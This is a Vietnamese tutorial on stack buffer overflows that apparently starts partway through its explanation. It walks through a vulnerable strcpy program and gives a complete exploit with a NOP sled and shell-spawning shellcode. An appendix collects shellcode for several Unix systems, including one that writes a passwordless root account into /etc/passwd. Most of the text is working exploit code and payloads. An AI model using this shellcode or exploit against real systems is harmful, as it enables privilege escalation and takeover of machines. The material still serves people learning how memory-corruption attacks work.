Tìm hiểu đầy đủ về tràn bộ đệm
Tràn bộ đệm là một trong những lỗ hỏng bảo mật lớn nhất hiện nay. Vậy
tràn bộ đệm là gì? Làm thế nào để thi hành các mã lệnh nguy hiểm qua
tràn bộ đệm.?
***Lưu ý*** một ít kiến thức về Assembly, C, GDB và Linux là điều cần
thiết đối với bạn!
a buffer lại chính là
shellcode(do ta đã copy large_string vào buffer bằng hàm strcpy), nên
shellcode sẽ được thi hành, nó sẽ đổ ra một shell lệnh.
Ví dụ 2:
Để viết tràn bộ đệm, bạn phải biến địa chỉ của buffer trên stack. Thật may
cho chúng ta là hầu như tất cả các chương trình đều có cùng địa chỉ bắt
đầu stack. Chúng ta có thể lấy được địa chỉ bắt đầu của stack qua chương
trình sau:
sp.c
-----------------------------------------------------------
-------------------
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main() {
printf("0x%x\n", get_sp());
}
-----------------------------------------------------------
-------------------
[đt@localhost ~/vicki]$ cc -o sp sp.c
[đt@localhost ~/vicki]$ ./sp
0xbffffb07
[đt@localhost ~/vicki]$
Giả sử chương trình mà chúng ta cố làm tràn bộ đệm như sau:
vulnerable.c
----------------------------------------------
int main(int argc, char *argv[])
{
char buffer[500];
if(argc>=2) strcpy(buffer, argv[1]);
return 0;
}
----------------------------------------------
Đây là chương trình exploit.c. exploit sẽ làm tràn bộ đệm của vulnerable
và buộc vulnerable đổ một shell lệnh cho chúng ta.
exploit.c
-----------------------------------------------------------
-------------------
#include
#define BUFFERSIZE 600
#define OFFSET 0
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x
b0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x
40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void)
{
__asm__("movl %esp, %eax");
}
int main(int argc, char *argv[])
{
int i, offset=OFFSET, bsize=BUFFERSIZE;
long esp, ret, *addr_ptr;
char *buffer, *ptr, *osptr;
if (argc>1) bsize=atoi(argv[1]);
if (argc>2) offset=atoi(argv[2]);
esp=get_esp();
ret=esp-offset;
printf("Stack pointer: 0x%x\n",esp);
printf("Offset : 0x%x\n",offset);
printf("Return addr : 0x%x\n",ret);
if (!(buffer=malloc(bsize)))
{
printf("Khong the cap phat bo nho.\n");
exit(-1);
}
ptr=buffer;
addr_ptr=(long *)ptr;
for (i=0;i<bsize;i+=4)
*(addr_ptr++)=ret;
for (i=0;i<bsize/2;i++)
buffer[i]=NOP;
ptr=buffer+((bsize/2)-(strlen(shellcode)/2));
for (i=0;i<strlen(shellcode);i++)
*(ptr++)=shellcode[i];
buffer[bsize-1]=0;
execl("./vulnerable","vulnerable",buffer,0);
}
-----------------------------------------------------------
-------------------
[đt@localhost ~/vicki]$ cc -o vulnerable vulnerable.c
[đt@localhost ~/vicki]$ cc -o exploit exploit.c
[đt@localhost ~/vicki]$ ./exploit
Stack pointer: 0xbffffaf8
Offset : 0x0
Return addr : 0xbffffaf8
sh-2.04$
Giải thích:
Trước hết, chúng ta cần xác định địa chỉ trở về khi tràn bộ đệm.
esp=get_esp();
ret=esp-offset;
Địa chỉ trở về khi tràn bộ đệm = ESP(địa chỉ bắt đầu của stack) - OFFSET
. Tại sao phải trừ cho offset? Bởi vì chúng ta có gọi hàm
execl("./vulnerable","vulnerable",buffer,0); sau cùng, nên ESP lúc này sẽ
bị trừ đi một số bytes do chương trình exploit có sử dụng một số bytes trên
stack cho các tham số và biến cục bộ của hàm.Điều này sẽ tăng khả năng
địa chỉ trở về trỏ đến một nơi nào đó trong buffer[] của vulnerable, nơi mà
chúng ta sẽ đặt NOPs và shellcode.
Quan sát stack:
+---------------+
| argv[] & argc |
| của exploit |
+---------------+
| return addr 1 |
+---------------+
| ebp 1 |
+---------------+
| |
| các biến cục |
| bộ của exploit|
| |
+---------------+
| argv[] & argc |
| của exploit |
+---------------+
| return addr 2 | ----\
+---------------+ |
| ebp 2 | |
+---------------+ |
| | |
| buffer[] của | |
| vulnerable | <---/
| |
+---------------+
Chúng ta cần làm tràn buffer[] của vulnerable để return addr 2 trỏ đến đâu
đó trong buffer[]. Cũng như ví dụ 1- overflow.c(bạn hãy xem lại thật kĩ ví
dụ 1), chúng ta sẽ tạo một vùng nhớ trên heap:
if (!(buffer=malloc(bsize)))
{
printf("Khong the cap phat bo nho.\n");
exit(-1);
}
Bây giờ lắp đầy buffer bằng địa chỉ trở về mà chúng ta đã tính được:
ptr=buffer;
addr_ptr=(long *)ptr;
for (i=0;i<bsize;i+=4)
*(addr_ptr++)=ret;
Tiếp theo chúng ta sẽ lắp đầy 1/2 buffer bằng NOPs
for (i=0;i<bsize/2;i++)
buffer[i]=NOP;
Sau đó, chúng ta đặt shellcode vào giữa NOPs
ptr=buffer+((bsize/2)-(strlen(shellcode)/2));
for (i=0;i<strlen(shellcode);i++)
*(ptr++)=shellcode[i];
Cuối cùng đặt '\0' vào buffer để hàm strcpy() trong vulnerable biết đã hết
data cần copy.
buffer[bsize-1]=0;
Tiến hành làm tràn bộ đệm của vulnerable, bạn sẽ có được shell lệnh do
vulnerable spawn.
execl("./vulnerable","vulnerable",buffer,0);
Quan sát stack, buffer[] của vulnerable và return addr 2 sau khi tràn bộ
đệm sẽ có dạng như sau:
+------------+
|return addr2| -----\
+------------+ |
| ebp 2 | |
+------------+ |
| ... | |
| nop | |
| ... | |
| shellcode | |
| ... | |
| nop | |
| nop | <----/
| nop |
| ... |
+------------+
Chúng ta hi vọng rằng return addr 2 sẽ trỏ đến 1 nop trước shellcode. Các
câu lệnh NOPs sẽ không làm gì hết, đến khi gặp shellcode, shellcode sẽ đổ
shell lệnh cho chúng ta(bạn hãy xem lại phần "Hình dung cách đặt
shellcode trên stack).
Phụ lục
Các loại shellcode
BSDi
char code[] =
"\xeb\x57\x5e\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e"
"\x26\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8\x31"
"\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2\x31\xc0\x88"
"\x46\x0b\x89\xf3\x83\xc0\x05\x31\xc9\x83\xc1\x01\x31"
"\xd2\xcd\x80\x89\xc3\x31\xc0\x83\xc0\x04\x31\xd2\x88"
"\x56\x27\x89\xf1\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31"
"\xc0\x83\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
"BIN/SH";
FreeBSD
char code[]=
"\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x
76"
"\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x
1b"
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\x
ff"
"\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\x
ff"
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x
02"
"\x02\x02\x02/bin/sh.-c.sh";
Replace .sh with .anycommand
Linux x86
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\
xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\
x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
OpenBSD
OpenBSD shellcode that adds an unpassworded root login
"w00w00" to /etc/passwd... Courtesy of w00w00.
(Changed from /tmp/passwd to /etc/passwd... give kiddies
a chance ;)
char shell[]=
"\xeb\x2b\x5e\x31\xc0\x88\x46\x0b"
"\x88\x46\x29\x50\xb0\x09\x50\x31"
"\xc0\x56\x50\xb0\x05\xcd\x80\x89"
"\xc3\x6a\x1d\x8d\x46\x0c\x50\x53"
"\x50\x31\xc0\xb0\x04\xcd\x80\x31"
"\xc0\xb0\x01\xcd\x80\xe8\xd0\xff"
"\xff\xff\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x30\x77\x30"
"\x30\x77\x30\x30\x3a\x3a\x30\x3a"
"\x30\x3a\x77\x30\x30\x77\x30\x30"
"\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f"
"\x73\x68\x0a\x30\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff";
Solaris / Sparc
char c0de[] =
/* setreuid() */
"\x82\x10\x20\xca" /* mov 0xca,
%g1 */
"\x92\x1a\x40\x09" /* xor %o1,
%o1, %o1 */
"\x90\x0a\x40\x09" /* and %o1,
%o1, %o0 */
"\x91\xd0\x20\x08" /* ta 8
*/
"\x2d\x0b\xd8\x9a" /* sethi
$0xbd89a, %l6 */
"\xac\x15\xa1\x6e" /* or %l6,
0x16e, %l6 */
"\x2f\x0b\xdc\xda" /* sethi
$0xbdcda, %l7 */
"\x90\x0b\x80\x0e" /* and %sp,
%sp, %o0 */
"\x92\x03\xa0\x08" /* add %sp, 8,
%o1 */
"\x94\x1a\x80\x0a" /* xor %o2,
%o2, %o2 */
"\x9c\x03\xa0\x10" /* add %sp,
0x10, %sp */
"\xec\x3b\xbf\xf0" /* std %l6,
[%sp - 0x10] */
"\xdc\x23\xbf\xf8" /* st %sp,
[%sp - 0x08] */
"\xc0\x23\xbf\xfc" /* st %g0,
[%sp - 0x04] */
"\x82\x10\x20\x3b" /* mov $0x3b,
%g1 */
"\x91\xd0\x20\x08" /* ta 8
Solaris / x86
char c0de[] =
"\xeb\x0a" /* jmp initcall
*/
"\x9a\x01\x02\x03\x5c\x07\x04" /* lcall
*/
"\xc3" /* ret
*/
"\xeb\x05" /* jmp setuidcode
*/
"\xe8\xf9\xff\xff\xff" /* call jmpz
*/
"\x5e" /* popl %esi
*/
"\x29\xc0" /* subl %eax, %eax
*/
"\x88\x46\xf7" /* movb %al,
0xfffffff7(%esi) */
"\x89\x46\xf2" /* movl %eax,
0xfffffff2(%esi) */
"\x50" /* pushl %eax
*/
"\xb0\x8d" /* movb $0x8d, %al
*/
"\xe8\xe0\xff\xff\xff" /* call initlcall
*/
"\x29\xc0" /* subl %eax, %eax
*/
"\x50" /* pushl %eax
*/
"\xb0\x17" /* movb $0x17, %al
*/
"\xe8\xd6\xff\xff\xff" /* call initlcall
*/
"\xeb\x1f" /* jmp callz
*/
"\x5e" /* popl %esi
*/
"\x8d\x1e" /* leal (%esi), %ebx
*/
"\x89\x5e\x0b" /* movl %ebx,
0x0b(%esi) */
"\x29\xc0" /* subl %eax, %eax
*/
"\x88\x46\x19" /* movb %al,
0x19(%esi) */
"\x89\x46\x14" /* movl %eax,
0x14(%esi) */
"\x89\x46\x0f" /* movl %eax,
0x0f(%esi) */
"\x89\x46\x07" /* movl %eax,
0x07(%esi) */
"\xb0\x3b" /* movb $0x3b, %al
*/
"\x8d\x4e\x0b" /* leal 0x0b(%esi),
%ecx */
"\x51" /* pushl %ecx
*/
"\x51" /* pushl %ecx
*/
"\x53" /* pushl %ebx
*/
"\x50" /* pushl %eax
*/
"\xeb\x18" /* jmp lcall
*/
"\xe8\xdc\xff\xff\xff" /* call start
*/
"\x2f\x62\x69\x6e\x2f\x73\x68" /* /bin/sh
*/
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
"\x9a\x04\x04\x04\x04\x07\x04"; /* lcall
*/
Công cụ tạo shellcode "Hellkit"
Hellkit là một công cụ dùng tạo shellcode cho Linux rất dễ dùng. Hellkit
rất đa năng, đặc biệt Hellkit còn cho phép tạo shellcode có kích thước lên
đến 65535 bytes!
Tài liệu tham khảo
"Smashing The Stack For Fun And Profit"(phrack 49-14) - Aleph One
"Advanced buffer overflow exploits" - Taeho Oh
Do hiểu biết còn nhiều hạn chế nên bài viết này không tránh khỏi những
thiếu xót, rất mong nhận được sự đóng góp, giúp đỡ của các bạn để bài
viết được hoàn thiện hơn. Thanx, đt. Vicki's real fan!
Back
Nhóm Vicki -
File đính kèm:
Tim_hieu_tran_bo_dem.pdf

